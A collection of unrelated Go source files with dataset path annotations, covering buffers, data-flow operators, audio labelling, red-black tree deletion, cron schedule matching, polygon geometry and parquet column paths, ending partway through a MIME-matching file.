func (buf *swap) Read(p []byte) (n int, err error) {
if buf.A.Len() > 0 {
return buf.A.Read(p)
}
return buf.B.Read(p)
}
func (buf *swap) ReadAt(p []byte, off int64) (n int, err error) {
if buf.A.Len() > 0 {
return buf.A.ReadAt(p, off)
}
return buf.B.ReadAt(p, off)
}
func (buf *swap) Write(p []byte) (n int, err error) {
switch {
case buf.B.Len() > 0:
n, err = buf.B.Write(p)
case buf.A.Len()+int64(len(p)) > buf.A.Cap():
_, err = io.Copy(buf.B, buf.A)
if err == nil {
n, err = buf.B.Write(p)
}
default:
n, err = buf.A.Write(p)
}
return n, err
}
func (buf *swap) WriteAt(p []byte, off int64) (n int, err error) {
switch {
case buf.B.Len() > 0:
n, err = buf.B.WriteAt(p, off)
case off+int64(len(p)) > buf.A.Cap():
_, err = io.Copy(buf.B, buf.A)
if err == nil {
n, err = buf.B.WriteAt(p, off)
}
default:
n, err = buf.A.WriteAt(p, off)
}
return n, err
}
func (buf *swap) Reset() {
buf.A.Reset()
buf.B.Reset()
}
func init() {
gob.Register(&swap{})
} | vendor/github.com/djherbis/buffer/swap.go | 0.579162 | 0.538923 | swap.go | starcoder |
package flow
// Map operates on each row, and the returned results are passed to next dataset.
func (d *Dataset) Map(code string) *Dataset {
ret, step := add1ShardTo1Step(d)
step.Name = "Map"
step.Script = d.FlowContext.createScript()
step.Script.Map(code)
return ret
}
// ForEach operates on each row, but the results are not collected.
// This is used to create some side effects.
func (d *Dataset) ForEach(code string) *Dataset {
ret, step := add1ShardTo1Step(d)
step.Name = "ForEach"
step.Script = d.FlowContext.createScript()
step.Script.ForEach(code)
return ret
}
// FlatMap translates each row into multiple rows.
func (d *Dataset) FlatMap(code string) *Dataset {
ret, step := add1ShardTo1Step(d)
step.Name = "FlatMap"
step.Script = d.FlowContext.createScript()
step.Script.FlatMap(code)
return ret
}
// Filter conditionally filter some rows into the next dataset.
// The code should be a function just returning a boolean result.
func (d *Dataset) Filter(code string) *Dataset {
ret, step := add1ShardTo1Step(d)
ret.IsLocalSorted = d.IsLocalSorted
ret.IsPartitionedBy = d.IsPartitionedBy
step.Name = "Filter"
step.Script = d.FlowContext.createScript()
step.Script.Filter(code)
return ret
}
func add1ShardTo1Step(d *Dataset) (ret *Dataset, step *Step) {
ret = d.FlowContext.newNextDataset(len(d.Shards))
step = d.FlowContext.AddOneToOneStep(d, ret)
return
}
// Select selects multiple fields into the next dataset. The index starts from 1.
func (d *Dataset) Select(sortOptions ...*SortOption) *Dataset {
sortOption := concat(sortOptions)
ret, step := add1ShardTo1Step(d)
step.Name = "Select"
step.Script = d.FlowContext.createScript()
step.Script.Select(sortOption.Indexes())
return ret
}
// LocalLimit take the local first n rows and skip all other rows.
func (d *Dataset) LocalLimit(n int) *Dataset {
ret, step := add1ShardTo1Step(d)
ret.IsLocalSorted = d.IsLocalSorted
ret.IsPartitionedBy = d.IsPartitionedBy
step.Name = "Limit"
step.Script = d.FlowContext.createScript()
step.Script.Limit(n)
return ret
} | flow/dataset_map.go | 0.799364 | 0.481637 | dataset_map.go | starcoder |
package libaural2
import (
"bytes"
"crypto/sha256"
"encoding/base32"
"encoding/binary"
"encoding/gob"
"fmt"
"image/color"
"github.com/lucasb-eyer/go-colorful"
"github.ibm.com/Blue-Horizon/aural2/urbitname"
)
// Duration of audio clip in seconds
const Duration int = 10
// SampleRate of audio
const SampleRate int = 16000
// StrideWidth is the number of samples in one stride
const StrideWidth int = 512
// SamplePerClip is the number of samples in each clip
const SamplePerClip int = SampleRate * Duration
// StridesPerClip is the number of strides per clip
const StridesPerClip int = SamplePerClip / StrideWidth
// SeqLen is the length of sequences to be feed to the LSTM for training.
const SeqLen int = 100
// AudioClipLen is the number of bytes in one audio clip
const AudioClipLen int = SamplePerClip * 2
// InputSize is the length of the input vector, currently one MFCC
const InputSize int = 13
// BatchSize is the size of the one batch
const BatchSize int = 7
// StateList is a list of States
type StateList [StridesPerClip]State
// Input is the one input to the LSTM
type Input [InputSize]float32
// InputSet is the set of inputs for one clip.
type InputSet [StridesPerClip]Input
// Output is one output, the softmax array of States.
type Output []float32
// OutputSet is the set of outputs for one clip.
type OutputSet [StridesPerClip]Output
// Serialize converts an outputSet to a []bytes
func (outputSet *OutputSet) Serialize() (serialized []byte) {
buf := new(bytes.Buffer)
var count int
for _, output := range outputSet {
for _, cmdVal := range output {
binary.Write(buf, &binary.LittleEndian, cmdVal)
}
}
fmt.Println("count", count*4)
serialized = buf.Bytes()
return
}
// AudioClip stores a `Duration` second clip of int16 raw audio
type AudioClip [AudioClipLen]byte
// ID computes the hash of the audio clip
func (rawBytes *AudioClip) ID() ClipID {
return sha256.Sum256(rawBytes[:])
}
// ClipID is the hash of a clip of raw audio
type ClipID [32]byte
// FSsafeString returns an encoding of the ClipID safe for filesystems and URLs.
func (hash ClipID) FSsafeString() string {
return base32.StdEncoding.EncodeToString(hash[:])
}
func (hash ClipID) String() string {
return urbitname.Encode(hash[0:4])
}
// VocabName is the name of a vocabulary
type VocabName string
// State is one exclusive thing the NN can output
type State int
// Just for testing
const (
Nil State = iota
Unknown
Foo
Bar
Baz
Yes
No
)
// Vocabulary is one exclusive list of words
type Vocabulary struct {
Name VocabName
Size int
Names map[State]string
Hue map[State]float64
KeyMapping map[string]State
}
// Color turns a cmd into something that implements the color.Color interface
func (voc Vocabulary) Color(state State) (c color.Color) {
c = colorful.Hsv(voc.Hue[state], 1, 1)
return
}
var testVocab Vocabulary
// Hue returns the hue as a float64
func (state State) Hue() (hue float64) {
hash := sha256.Sum256([]byte{uint8(state)})
hue = float64(hash[0]) * float64(hash[1]) / (255 * 255) * 360
return
}
// RGBA implements color.Color
func (state State) RGBA() (uint32, uint32, uint32, uint32) {
return colorful.Hsv(state.Hue(), 1, 1).RGBA()
}
// Label is one period of time.
type Label struct {
State State
Start float64 // the duration since the start of the clip.
End float64
}
// LabelSet is the set of labels for one Clip
type LabelSet struct {
VocabName VocabName
ID ClipID
Labels []Label
}
// ToStateIDArray converts the labelSet to a slice of State IDs
func (labels *LabelSet) ToStateIDArray() (stateArray [StridesPerClip]int32) {
for i := range stateArray {
loc := float64(i) / float64(StridesPerClip) * float64(Duration)
for _, label := range labels.Labels {
if loc > label.Start && loc < label.End {
stateArray[i] = int32(label.State)
continue
}
}
}
return
}
// ToStateArray converts the labelSet to a slice of States
func (labels *LabelSet) ToStateArray() (stateArray [StridesPerClip]State) {
for i := range stateArray {
loc := float64(i) / float64(StridesPerClip) * float64(Duration)
for _, label := range labels.Labels {
if loc > label.Start && loc < label.End {
stateArray[i] = label.State
continue
}
}
}
return
}
// IsGood returns true iff the labelsSet contains no overlaps or other bad things. Executes in O(n2) time.
func (labels *LabelSet) IsGood() bool {
for _, label := range labels.Labels {
if label.Start < 0 {
return false
}
if label.End > float64(Duration) {
return false
}
for _, otherLabel := range labels.Labels {
if label.Start > otherLabel.Start && label.Start < otherLabel.End {
return false
}
if label.End > otherLabel.Start && label.End < otherLabel.End {
return false
}
}
}
return true
}
// Serialize converts a LabelSet to []byte
func (labels *LabelSet) Serialize() (serialized []byte, err error) {
buf := bytes.Buffer{}
gobEnc := gob.NewEncoder(&buf)
if err = gobEnc.Encode(labels); err != nil {
return
}
serialized = buf.Bytes()
return
}
// DeserializeLabelSet converts a []byte back into a LabelSet.
func DeserializeLabelSet(serialized []byte) (labelSet LabelSet, err error) {
dec := gob.NewDecoder(bytes.NewReader(serialized))
if err = dec.Decode(&labelSet); err != nil {
return
}
return
}
// GenFakeLabelSet creates a fake LabelSet for testing.
func GenFakeLabelSet() (output LabelSet) {
output.Labels = []Label{
Label{
State: Nil,
Start: 0,
End: 1,
},
Label{
State: Yes,
Start: 1,
End: 2,
},
Label{
State: No,
Start: 2,
End: 3,
},
Label{
State: Nil,
Start: 3,
End: 4,
},
Label{
State: Yes,
Start: 4,
End: 5,
},
Label{
State: No,
Start: 5,
End: 6,
},
Label{
State: Nil,
Start: 6,
End: 7,
},
Label{
State: Yes,
Start: 7,
End: 8,
},
Label{
State: No,
Start: 8,
End: 9,
},
Label{
State: Nil,
Start: 9,
End: 10,
},
}
return
}
//GenFakeInput produces fake a mfcc list exactly matching the given cmdIdArray
func GenFakeInput(cmds [StridesPerClip]int32) (fakeMFCCs [][]float32) {
fakeMFCCs = make([][]float32, StridesPerClip)
for i, cmd := range cmds {
fakeMFCCs[i] = make([]float32, InputSize)
if cmd == 0 {
fakeMFCCs[i][0] = 1
}
if cmd == 1 {
fakeMFCCs[i][1] = 1
}
if cmd == 2 {
fakeMFCCs[i][2] = 1
}
if cmd == 3 {
fakeMFCCs[i][3] = 1
}
}
return
} | libaural2/libaural2.go | 0.702326 | 0.407628 | libaural2.go | starcoder |
package forwardt
import "github.com/melvinodsa/goOdsa/utils"
//FTransform does the forward transform of a given string
func FTransform(iString []byte) utils.Data {
result := utils.NewODSAData()
if len(iString) == 0 {
return result
}
result.SetLastLetter(0)
result.SetLastPos(-1)
sLen := len(iString)
//Algorithm starts
for i := 0; i < sLen; i++ {
result.AddData(iString[i])
if iString[i] > result.GetLastLetter() {
result.SetLastLetter(iString[i])
}
result.SetLastPos(i)
}
return result
}
/*fTransformWrapper is a wrapper function for concuurent
transformation of the input data to be processed in chunks
*/
func fTransformWrapper(channel chan utils.ChanData, iString []byte, index int) {
result := FTransform(iString)
channel <- utils.ChanData{Data: result, Index: index}
}
/*fTransformFactory creates the wrappers function necessary for the chunk processing
of data once the maxChunk limit is crossed. endChannel is used to communicate the finished
data array.
*/
func fTransformFactory(channel chan utils.ChanData, endChannel chan []utils.ChanData, strings [][]byte, size, startIndex int) {
dataArray := []utils.ChanData{}
currentSize := 0
for {
//Getting each data from the channel
data := <-channel
dataArray = append(dataArray, data)
currentSize++
if startIndex < size {
//Creating a wrapper function to process next chunk
go fTransformWrapper(channel, strings[startIndex], startIndex)
startIndex++
} else if currentSize == size {
endChannel <- dataArray
<-channel
return
}
}
}
/*FTransformChunk will transform the chunk data with
go routines handling the FTransform strings is the
array of byte array containing the data to be compressed in
chunks. maxChunks has the maximum chunks to be processed concurrently.
endChannel will passed to the factory function to communicate the end result
so that other can use the data.
*/
func FTransformChunk(strings [][]byte, maxChunks int, channel chan utils.ChanData, endChannel chan []utils.ChanData) {
size := len(strings)
useFactory := false
if maxChunks < size {
size = maxChunks
useFactory = true
}
//Cuncurrently processing the data to be transformed
for i := 0; i < size; i++ {
go fTransformWrapper(channel, strings[i], i)
}
//Once the max Limit is reached then using the factory function
// to proocess the rest of the chunks
if useFactory {
size = len(strings)
go fTransformFactory(channel, endChannel, strings, size, maxChunks)
}
} | modules/forwardt/forwardt.go | 0.612541 | 0.405625 | forwardt.go | starcoder |
package main
import (
"image"
"image/color"
"math"
)
// Channel stores a histogram of all values present in
// and image for a specific colour channel
type Channel struct {
Shades [65536]uint32
Min, Max, Total uint32
}
// Add adds a colour value to the channel
func (c *Channel) Add(val uint32) {
c.Shades[val] += 1
c.Total += 1
if val < c.Min {
c.Min = val
}
if val > c.Max {
c.Max = val
}
}
// Percentile finds the value at percentile pct in
// all the values stored for the channel.
func (c Channel) Percentile(pct float64) uint16 {
total := float64(c.Total)
var sum uint32
for i := c.Min; i < c.Max; i++ {
sum += c.Shades[i]
if float64(sum)/total > pct {
return uint16(i)
}
}
return 65535
}
// Merge adds up the values in two channels.
func (c *Channel) Merge(other *Channel) {
if other.Min < c.Min {
c.Min = other.Min
}
if other.Max > c.Max {
c.Max = other.Max
}
for i := c.Min; i < c.Max; i++ {
c.Shades[i] += other.Shades[i]
}
c.Total += other.Total
}
// Palette groups a Red, a Green and a Blue channel
type Palette struct {
Red, Green, Blue Channel
Total int
}
// Merge merges another Palette with this one.
func (p *Palette) Merge(other Palette) {
p.Red.Merge(&other.Red)
p.Green.Merge(&other.Green)
p.Blue.Merge(&other.Blue)
p.Total += other.Total
}
// Add adds a new colour value to a Palette
func (p *Palette) Add(c color.RGBA64) {
r, g, b, _ := c.RGBA()
p.Red.Add(r)
p.Green.Add(g)
p.Blue.Add(b)
p.Total += 1
}
type Range struct {
Low, High uint16
}
type Transformation struct {
Red, Green, Blue Range
Contrast float64
}
type Mapping func(color.RGBA64) (out color.RGBA64)
func (m Mapping) Apply(input image.Image) image.Image {
bounds := input.Bounds()
copy := image.NewRGBA64(bounds)
for x := bounds.Min.X; x < bounds.Max.X; x++ {
for y := bounds.Min.Y; y < bounds.Max.Y; y++ {
in := color.RGBA64Model.Convert(input.At(x, y))
out := m(in.(color.RGBA64))
copy.Set(x, y, out)
}
}
return copy
}
func (t Transformation) Sigmoid() Mapping {
rmin, rmax := float64(t.Red.Low), float64(t.Red.High)
gmin, gmax := float64(t.Green.Low), float64(t.Green.High)
bmin, bmax := float64(t.Blue.Low), float64(t.Blue.High)
rdiff := float64(rmax - rmin)
gdiff := float64(gmax - gmin)
bdiff := float64(bmax - bmin)
return func(in color.RGBA64) (out color.RGBA64) {
valr := (float64(in.R) - rmin) - (rdiff / 2)
valg := (float64(in.G) - gmin) - (gdiff / 2)
valb := (float64(in.B) - bmin) - (bdiff / 2)
valr *= (math.Pi / (rdiff / t.Contrast))
valg *= (math.Pi / (gdiff / t.Contrast))
valb *= (math.Pi / (bdiff / t.Contrast))
out.R = uint16((math.Erf(valr) + 1) * 32767)
out.G = uint16((math.Erf(valg) + 1) * 32767)
out.B = uint16((math.Erf(valb) + 1) * 32767)
out.A = in.A
return out
}
}
func (t Transformation) Linear() Mapping {
rmin, rmax := float64(t.Red.Low), float64(t.Red.High)
gmin, gmax := float64(t.Green.Low), float64(t.Green.High)
bmin, bmax := float64(t.Blue.Low), float64(t.Blue.High)
rdiff := float64(rmax - rmin)
gdiff := float64(gmax - gmin)
bdiff := float64(bmax - bmin)
unit := func(v float64) float64 {
if v < 0 {
return 1
}
if v > 1 {
return 0
}
return 1 - v
}
return func(in color.RGBA64) (out color.RGBA64) {
// normalize to 0..1
valr := unit((float64(in.R) - rmin) / rdiff)
valg := unit((float64(in.G) - gmin) / gdiff)
valb := unit((float64(in.B) - bmin) / bdiff)
out.R = uint16(valr * 65535.0)
out.G = uint16(valg * 65535.0)
out.B = uint16(valb * 65535.0)
out.A = in.A
return out
}
} | palette.go | 0.744192 | 0.416915 | palette.go | starcoder |
package sdl
// #include "includes.h"
import "C"
// CPU feature detection for SDL.
const (
CACHELINE_SIZE = C.SDL_CACHELINE_SIZE
)
// This function returns the number of CPU cores available.
// ↪ https://wiki.libsdl.org/SDL_GetCPUCount
func GetCPUCount() (retval int) {
retval = int(C.SDL_GetCPUCount())
return
}
// This function returns the L1 cache line size of the CPU
//
// This is useful for determining multi-threaded structure padding or
// SIMD prefetch sizes.
// ↪ https://wiki.libsdl.org/SDL_GetCPUCacheLineSize
func GetCPUCacheLineSize() (retval int) {
retval = int(C.SDL_GetCPUCacheLineSize())
return
}
// This function returns true if the CPU has the RDTSC instruction.
// ↪ https://wiki.libsdl.org/SDL_HasRDTSC
func HasRDTSC() (retval bool) {
retval = C.SDL_TRUE==(C.SDL_HasRDTSC())
return
}
// This function returns true if the CPU has AltiVec features.
// ↪ https://wiki.libsdl.org/SDL_HasAltiVec
func HasAltiVec() (retval bool) {
retval = C.SDL_TRUE==(C.SDL_HasAltiVec())
return
}
// This function returns true if the CPU has MMX features.
// ↪ https://wiki.libsdl.org/SDL_HasMMX
func HasMMX() (retval bool) {
retval = C.SDL_TRUE==(C.SDL_HasMMX())
return
}
// This function returns true if the CPU has 3DNow! features.
// ↪ https://wiki.libsdl.org/SDL_Has3DNow
func Has3DNow() (retval bool) {
retval = C.SDL_TRUE==(C.SDL_Has3DNow())
return
}
// This function returns true if the CPU has SSE features.
// ↪ https://wiki.libsdl.org/SDL_HasSSE
func HasSSE() (retval bool) {
retval = C.SDL_TRUE==(C.SDL_HasSSE())
return
}
// This function returns true if the CPU has SSE2 features.
// ↪ https://wiki.libsdl.org/SDL_HasSSE2
func HasSSE2() (retval bool) {
retval = C.SDL_TRUE==(C.SDL_HasSSE2())
return
}
// This function returns true if the CPU has SSE3 features.
// ↪ https://wiki.libsdl.org/SDL_HasSSE3
func HasSSE3() (retval bool) {
retval = C.SDL_TRUE==(C.SDL_HasSSE3())
return
}
// This function returns true if the CPU has SSE4.1 features.
// ↪ https://wiki.libsdl.org/SDL_HasSSE41
func HasSSE41() (retval bool) {
retval = C.SDL_TRUE==(C.SDL_HasSSE41())
return
}
// This function returns true if the CPU has SSE4.2 features.
// ↪ https://wiki.libsdl.org/SDL_HasSSE42
func HasSSE42() (retval bool) {
retval = C.SDL_TRUE==(C.SDL_HasSSE42())
return
}
// This function returns true if the CPU has AVX features.
// ↪ https://wiki.libsdl.org/SDL_HasAVX
func HasAVX() (retval bool) {
retval = C.SDL_TRUE==(C.SDL_HasAVX())
return
}
// This function returns true if the CPU has AVX2 features.
// ↪ https://wiki.libsdl.org/SDL_HasAVX2
func HasAVX2() (retval bool) {
retval = C.SDL_TRUE==(C.SDL_HasAVX2())
return
}
// This function returns the amount of RAM configured in the system, in
// MB.
// ↪ https://wiki.libsdl.org/SDL_GetSystemRAM
func GetSystemRAM() (retval int) {
retval = int(C.SDL_GetSystemRAM())
return
} | sdl/SDL_cpuinfo.h.go | 0.560734 | 0.427038 | SDL_cpuinfo.h.go | starcoder |
package rbt
import (
"github.com/smartystreets/assertions"
)
// https://www.bilibili.com/video/BV1oq4y1d7jv?spm_id_from=333.999.0.0 0:35:0 双黑节点
func (t *RedBlackTree) Remove(v Key) (ret bool) {
ret = true
cur := t.Find(v)
if cur == nil {
return false
}
for {
// case 1
if cur.Left == nil && cur.Right == nil {
t.removeCaseOne(cur)
return
}
// case 2
if (cur.Left == nil && cur.Right != nil) || (cur.Left != nil && cur.Right == nil) {
t.removeCaseTwo(cur)
return
}
// case 3
cur = t.removeCaseThree(cur)
}
}
func (t *RedBlackTree) removeCaseOne(cur *RedBlackNode) {
parent := cur.Parent
// case 1.1 just remove
if cur.GetColor() == RED {
if cur == parent.Left {
parent.Left = nil
} else {
parent.Right = nil
}
cur.Clear()
return
}
// case 1.2 double black
t.doubleBlackFix(cur)
if cur.Parent == nil {
t.Root = nil
} else if cur == parent.Left {
parent.Left = nil
} else {
parent.Right = nil
}
cur.Clear()
}
// case 2 : one of the children is null, the other must be red, and the cur must be black
func (t *RedBlackTree) removeCaseTwo(cur *RedBlackNode) {
assertions.ShouldEqual(cur.GetColor(), BLACK)
candicate := cur.Left
if cur.Right != nil {
candicate = cur.Right
}
assertions.ShouldEqual(candicate.GetColor(), RED)
// just give key,value of candicate to cur , leave color unchanged , and delete candicate
cur.AcceptKeyValue(candicate)
cur.Left = nil
cur.Right = nil
candicate.Clear()
}
// case 3: all of the children are not null
func (t *RedBlackTree) removeCaseThree(cur *RedBlackNode) *RedBlackNode {
rightNode := cur.Right
//found the leftMost of rightNode, then give key value of leftMost to cur, finally delete leftMost
leftMost := t.FindMostLeft(rightNode)
cur.AcceptKeyValue(leftMost)
return leftMost // to case 1 or case 2
}
// double black, we delete node in the end, so we need not to consider the case that the double black is null
// https://www.bilibili.com/video/BV1oq4y1d7jv 0:09:42
// attention: the nil node is considered to BLACK too https://www.bilibili.com/video/BV19L411G72Y 1:20:30
// We first do double black fix then delete the node , by this method we avoid the situation that the double black is null
func (t *RedBlackTree) doubleBlackFix(db *RedBlackNode) {
for db.Parent != nil {
p, s, n, f := t.getPSNF(db)
assertions.ShouldNotBeNil(p)
assertions.ShouldNotBeNil(s)
// first consider the case that n and f all black
if n.IsBlack() && f.IsBlack() {
// case : 0111
if p.GetColor() == RED {
assertions.ShouldEqual(s.GetColor(), BLACK)
// db give one BLACK to p , and set color of s to RED
p.SetColor(BLACK)
s.SetColor(RED)
return
}
// case : 1111
if p.IsBlack() && s.IsBlack() {
// db give on BLACK to p , and set color of s to RED, p become double BLACK
s.SetColor(RED)
db = p
continue
}
/* case : 1011
P S
/ \ / \
DB S -> P F
/ \ / \
N F DB N
*/
if p.IsBlack() && s.IsRED() {
// this is a programming trick, we exchange the color of p with s firstly
// because after Rotate(), the pointer of p,s may be changed to different pointer
p.SetColor(RED)
s.SetColor(BLACK)
t.Rotate(f, s, p)
continue
}
}
/* case : y101
P N
/ \ / \
DB S -> P S
/ \ / \
N F DB F
*/
if n.IsRED() {
pColor := p.GetColor()
root, left, right := t.Rotate(n, s, p)
root.SetColor(pColor)
left.SetColor(BLACK)
right.SetColor(BLACK)
return
}
/* case : y110
P S
/ \ / \
DB S -> P F
/ \ / \
N F DB N
*/
pColor := p.GetColor()
root, left, right := t.Rotate(f, s, p)
root.SetColor(pColor)
left.SetColor(BLACK)
right.SetColor(BLACK)
return
}
}
// https://www.bilibili.com/video/BV19L411G72Y 1:25:16 n or f may be null
func (t *RedBlackTree) getPSNF(db *RedBlackNode) (p, s, n, f *RedBlackNode) {
p = db.Parent
if db == p.Left {
s = p.Right
n = s.Left // the node near to db
f = s.Right // the node far from db
} else {
s = p.Left
n = s.Right // the node near to db
f = s.Left // the node far from db
}
return
} | rb_tree_delete.go | 0.546496 | 0.496948 | rb_tree_delete.go | starcoder |
package insights
import (
"math"
"sort"
"time"
)
type Timeline map[time.Time]Conversation
func NewTimeline(c Conversation, d time.Duration) (t Timeline) {
if d == 0 {
d = time.Hour * 24
}
first, last := c.First(), c.Last()
start := time.Date(first.Time.Year(), first.Time.Month(), first.Time.Day(), 0, 0, 0, 0, time.UTC)
end := time.Date(last.Time.Year(), last.Time.Month(), last.Time.Day(), 23, 59, 59, 999999999, time.UTC)
days := int(math.Ceil(float64(end.Sub(start)) / float64(d)))
cursor := start
limit := start.Add(d).Add(time.Nanosecond * -1)
t = make(Timeline, days)
for i := 0; i < days; i++ {
t[cursor] = Conversation{}
for _, msg := range c {
if msg.Time.After(cursor) && msg.Time.Before(limit) {
t[cursor] = append(t[cursor], msg)
}
}
cursor = cursor.Add(d)
limit = cursor.Add(d).Add(time.Nanosecond * -1)
}
return
}
func (t Timeline) Extract() (count, words, letters map[time.Time]int) {
count = make(map[time.Time]int, len(t))
words = make(map[time.Time]int, len(t))
letters = make(map[time.Time]int, len(t))
for k, v := range t {
count[k] = v.Count()
words[k] = v.Words()
letters[k] = v.Letters()
}
return
}
func (t Timeline) Days() (keys []time.Time) {
for k := range t {
keys = append(keys, k)
}
sort.Slice(keys, func(i, j int) bool {
return keys[i].Before(keys[j])
})
return keys
}
func (t Timeline) Most() (date time.Time, count int) {
keys := t.Days()
if len(keys) > 0 {
date, count = keys[0], t[keys[0]].Count()
}
for _, k := range keys {
if len(t[k]) > count {
date, count = k, t[k].Count()
}
}
return
}
func (t Timeline) Least() (date time.Time, count int) {
keys := t.Days()
if len(keys) > 0 {
date, count = keys[0], t[keys[0]].Count()
}
for _, k := range keys {
if len(t[k]) < count {
date, count = k, t[k].Count()
}
}
return
}
func (t Timeline) Average() (messages, words, letters float64) {
m, w, l := 0, 0, 0
for _, v := range t {
m += v.Count()
w += v.Words()
l += v.Letters()
}
messages = float64(m) / float64(len(t))
words = float64(w) / float64(len(t))
letters = float64(l) / float64(len(t))
return
} | timeline.go | 0.593609 | 0.428712 | timeline.go | starcoder |
package nudge
import (
"fmt"
"strings"
"time"
"github.com/robfig/cron/v3"
)
var (
weekDays = map[time.Weekday]string{
time.Sunday: strings.ToLower(time.Sunday.String()),
time.Monday: strings.ToLower(time.Monday.String()),
time.Tuesday: strings.ToLower(time.Tuesday.String()),
time.Wednesday: strings.ToLower(time.Wednesday.String()),
time.Thursday: strings.ToLower(time.Thursday.String()),
time.Friday: strings.ToLower(time.Friday.String()),
time.Saturday: strings.ToLower(time.Saturday.String()),
}
scheduleParser = cron.NewParser(cron.Minute | cron.Hour | cron.Dom | cron.Month | cron.Dow)
)
// Greedy fuzzy search
func expandWeekDay(dayNames map[time.Weekday]string, shorthand string) (time.Weekday, error) {
shorthand = strings.ToLower(shorthand)
for i, day := range weekDays {
if strings.HasPrefix(day, shorthand) {
return time.Weekday(i), nil
}
}
return 0, fmt.Errorf("week day not matched")
}
func ValidateSchedule(schedule string) error {
for _, part := range strings.Split(schedule, ";") {
if _, err := scheduleParser.Parse(part); err != nil {
return err
}
}
return nil
}
// Parse and match cron schedule definition
// ┌───────────── minute (0 - 59)
// │ ┌───────────── hour (0 - 23)
// │ │ ┌───────────── day of the month (1 - 31)
// │ │ │ ┌───────────── month (1 - 12)
// │ │ │ │ ┌───────────── day of the week (0 - 6) (Sunday to Saturday;
// │ │ │ │ │ 7 is also Sunday on some systems)
// │ │ │ │ │
// │ │ │ │ │
// * * * * *
// Each value may specify an interval, e.g.:
// * 18-08 * * 1-5
// Translates to this: from 18 till 8 from Monday till Friday
func MatchSchedule(schedule string, advance time.Duration) bool {
for _, part := range strings.Split(schedule, ";") {
sc, err := scheduleParser.Parse(part)
if err != nil {
return false
}
now := time.Now().Add(advance)
next := sc.Next(now.Add(-time.Minute))
if next.Sub(now).Minutes() <= 0 {
return true
}
}
return false
} | pkg/nudge/schedule.go | 0.603815 | 0.409457 | schedule.go | starcoder |
package poly
import "fmt"
// Point is simple 2D point
type Point struct {
X, Y, Z float64
}
// InsideRect detects point is inside of another rect
func (p Point) InsideRect(rect Rect) bool {
if p.X < rect.Min.X || p.X > rect.Max.X {
return false
}
if p.Y < rect.Min.Y || p.Y > rect.Max.Y {
return false
}
return true
}
// Polygon is series of points that make up a polygon
type Polygon []Point
// InsideRect detects polygon is inside of another rect
func (p Polygon) InsideRect(rect Rect) bool {
if len(p) == 0 {
return false
}
for _, p := range p {
if !p.InsideRect(rect) {
return false
}
}
return true
}
// IntersectsRect detects polygon is inside of another rect
func (p Polygon) IntersectsRect(rect Rect) bool {
if len(p) == 0 {
return false
}
rectPoly := Polygon{rect.Min, {rect.Min.X, rect.Max.Y, 0}, rect.Max, {rect.Max.X, rect.Min.Y, 0}, rect.Min}
return p.Intersects(rectPoly, nil)
}
// String returns a string representation of the polygon.
func (p Polygon) String() string {
s := "{"
for i, p := range p {
if i > 0 {
s += ", "
}
s += fmt.Sprintf("{%v, %v}", p.X, p.Y)
}
s += "}"
return s
}
// Rect is rectangle
type Rect struct {
Min, Max Point
}
// Polygon returns a polygon for the rect
func (r Rect) Polygon() Polygon {
p := Polygon(make([]Point, 5))
p[0] = Point{X: r.Min.X, Y: r.Max.Y}
p[1] = Point{X: r.Max.X, Y: r.Max.Y}
p[2] = Point{X: r.Max.X, Y: r.Min.Y}
p[3] = Point{X: r.Min.X, Y: r.Min.Y}
p[4] = Point{X: r.Min.X, Y: r.Max.Y}
return p
}
// Rect returns the bounding box rectangle for the polygon
func (p Polygon) Rect() Rect {
var bbox Rect
for i, p := range p {
if i == 0 {
bbox.Min = p
bbox.Max = p
} else {
if p.X < bbox.Min.X {
bbox.Min.X = p.X
} else if p.X > bbox.Max.X {
bbox.Max.X = p.X
}
if p.Y < bbox.Min.Y {
bbox.Min.Y = p.Y
} else if p.Y > bbox.Max.Y {
bbox.Max.Y = p.Y
}
}
}
return bbox
}
// IntersectsRect detects if two bboxes intersect.
func (r Rect) IntersectsRect(rect Rect) bool {
if r.Min.Y > rect.Max.Y || r.Max.Y < rect.Min.Y {
return false
}
if r.Min.X > rect.Max.X || r.Max.X < rect.Min.X {
return false
}
return true
}
// InsideRect detects rect is inside of another rect
func (r Rect) InsideRect(rect Rect) bool {
if r.Min.X < rect.Min.X || r.Max.X > rect.Max.X {
return false
}
if r.Min.Y < rect.Min.Y || r.Max.Y > rect.Max.Y {
return false
}
return true
} | pkg/geojson/poly/poly.go | 0.869105 | 0.607052 | poly.go | starcoder |
package parquet
import "strings"
type columnPath []string
func (path columnPath) append(name string) columnPath {
return append(path[:len(path):len(path)], name)
}
func (path columnPath) equal(other columnPath) bool {
return stringsAreEqual(path, other)
}
func (path columnPath) less(other columnPath) bool {
return stringsAreOrdered(path, other)
}
func (path columnPath) String() string {
return strings.Join(path, ".")
}
func stringsAreEqual(strings1, strings2 []string) bool {
if len(strings1) != len(strings2) {
return false
}
for i := range strings1 {
if strings1[i] != strings2[i] {
return false
}
}
return true
}
func stringsAreOrdered(strings1, strings2 []string) bool {
n := len(strings1)
if n > len(strings2) {
n = len(strings2)
}
for i := 0; i < n; i++ {
if strings1[i] >= strings2[i] {
return false
}
}
return len(strings1) <= len(strings2)
}
type leafColumn struct {
node Node
path columnPath
maxRepetitionLevel int8
maxDefinitionLevel int8
columnIndex int16
}
func forEachLeafColumnOf(node Node, do func(leafColumn)) {
forEachLeafColumn(node, nil, 0, 0, 0, do)
}
func forEachLeafColumn(node Node, path columnPath, columnIndex, maxRepetitionLevel, maxDefinitionLevel int, do func(leafColumn)) int {
switch {
case node.Optional():
maxDefinitionLevel++
case node.Repeated():
maxRepetitionLevel++
maxDefinitionLevel++
}
if isLeaf(node) {
do(leafColumn{
node: node,
path: path,
maxRepetitionLevel: makeRepetitionLevel(maxRepetitionLevel),
maxDefinitionLevel: makeDefinitionLevel(maxDefinitionLevel),
columnIndex: makeColumnIndex(columnIndex),
})
return columnIndex + 1
}
for _, name := range node.ChildNames() {
columnIndex = forEachLeafColumn(
node.ChildByName(name),
path.append(name),
columnIndex,
maxRepetitionLevel,
maxDefinitionLevel,
do,
)
}
return columnIndex
}
func lookupColumnPath(node Node, path columnPath) Node {
for node != nil && len(path) > 0 {
node = node.ChildByName(path[0])
path = path[1:]
}
return node
}
func hasColumnPath(node Node, path columnPath) bool {
return lookupColumnPath(node, path) != nil
} | column_path.go | 0.603581 | 0.441854 | column_path.go | starcoder |
package mimemagic
import (
"sort"
"strings"
)
type byteMatcher interface {
matchByte(byte) bool
}
type matcher interface {
len() int
match(string) bool
}
type glob interface {
matcher
isCaseSensitive() bool
mediaType() simpleGlob
}
type value string
type list string
type byteRange struct{ min, max byte }
type any []byteMatcher
